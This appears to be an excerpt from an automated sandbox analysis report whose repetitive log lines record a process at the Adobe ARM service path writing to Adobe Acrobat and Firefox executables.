            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
